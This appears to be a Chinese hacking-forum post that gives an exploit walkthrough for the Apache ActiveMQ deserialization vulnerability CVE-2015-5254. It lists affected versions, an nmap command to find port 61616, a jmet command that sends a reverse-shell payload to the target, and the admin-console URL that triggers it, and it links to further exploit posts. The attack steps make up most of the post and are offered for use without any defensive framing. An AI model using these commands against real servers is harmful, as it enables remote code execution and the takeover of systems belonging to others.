黑客仓库

最全面知识的黑客论坛，全网最强大的漏洞数据聚合仓库丨黑客网站丨黑客论坛丨暗网丨红队武器库丨渗透测试丨POC/0day/Nday/1day丨网络安全丨黑客攻击丨服务器安全防御丨渗透测试入门丨网络技术交流丨蓝队丨护网丨红队丨欢迎来到黑客仓库，您可以在我们的论坛板块进行交流和学习。

立即注册账号！

POC ActiveMQ 反序列化漏洞（CVE-2015-5254）

主题发起人 Shacker
开始时间 09 10, 2024

Shacker

黑客倉庫站長

贡献: 21%

09 10, 2024

JavaScript:

## 漏洞概述

该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务（JMS）ObjectMessage对象利用该漏洞执行任意代码。

## 影响范围

```http
ActiveMQ < 5.13.0
```

## EXP

1、确定目标开启61616端口

```bash
 nmap -sV -Pn -T4 -sC -p 61616 IP
```

2、发送反弹payload

```bash
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "反弹shell命令" -Yp target-IP 61616
```

3、点击触发Browse event-Message ID ，成功反弹

[http://IP:8161/admin/message.jsp?id=ID&JMSDestination=event](http://ip:8161/admin/message.jsp?id=ID&JMSDestination=event)

POC 禅道 OA[CNVD-C-2020-121325]

POC CVE-2016-3088

点击展开...

好评 0 否决票

您必须登录或注册才可回复。

	POC ActiveMQ的PUT 上传getshellExP CVE-2016-3088 Shacker 09 13, 2024 POC/?Day漏洞数据
	POC JBoss 5.x-6.x 反序列化漏洞（CVE-2017-12149） Shacker 09 13, 2024 POC/?Day漏洞数据
	POC ActiveMQExPV1.0 Shacker 09 13, 2024 POC/?Day漏洞数据
	POC Apache ActiveMQ Shacker 09 10, 2024 POC/?Day漏洞数据
	泛微OA Ecology-泛微OA反序列化漏洞 Shacker 09 10, 2024 POC/?Day漏洞数据